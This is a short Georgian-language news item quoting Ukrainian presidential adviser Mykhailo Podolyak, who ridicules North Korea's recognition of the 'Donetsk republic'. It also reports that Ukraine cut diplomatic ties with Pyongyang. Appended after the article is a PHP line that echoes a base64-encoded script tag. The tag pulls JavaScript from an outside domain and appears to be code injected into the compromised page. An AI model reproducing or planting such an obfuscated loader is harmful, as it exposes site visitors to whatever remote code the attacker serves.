celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტის აპარატის უფროსის მრჩეველი, მიხაილო პოდოლიაკი, ჩრდილოეთ კორეის მიერ ე.წ დონეცკის რესპუბლიკის „დამოუკიდებლად“ აღიარებას გამოეხმაურა.
 
მისივე თქმით, გარკვეული პერიოდის შემდეგ, კორეის სახალხო დემოკრატიულმა რესპუბლიკამ შეიძლება, დამოუკიდებელი ბურიატია და ტივას დემოკრატიული რესპუბლიკა აღიაროს.
 
„ძალიან მომწონს უბრალო „პოლიტიკური ანეკდოტები“, სადაც „სულელის“ ტრადიციულ როლს აუცილებლად რუსი პროპაგანდისტები ასრულებენ... ასე რომ, დღეს ამ ანეკდოტურ გმირებს აქტიურად უხარიათ მნიშვნელოვანი „საგარეო პოლიტიკური გამარჯვება“. ვლადიმერ პუტინი კი ემზადება ახალ პარტნიორ ქვეყანაში ვიზიტისთვის - ირანი, ჩრდილოეთ კორეა... დანაშაულებრივმა ჯგუფებმა „დონეცკის რესპუბლიკა“ აღიარეს.
 
და მაინც, ცუდი ამბავი მაქვს „რუსული სამყაროს“ მხარდამჭერებისთვის. გარკვეული პერიოდის შემდეგ, კორეის სახალხო დემოკრატიულმა რესპუბლიკამ შეიძლება, დამოუკიდებელი ბურიატია და ტივას დემოკრატიული რესპუბლიკა აღიაროს" – ამბობს პოდოლიაკი.
 
აღსანიშნავია, რომ ამ გადაწყვეტილების გამო უკრაინამ ჩრდილოეთ კორეასთან დიპლომატიური ურთიერთობები გაწყვიტა.
587
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");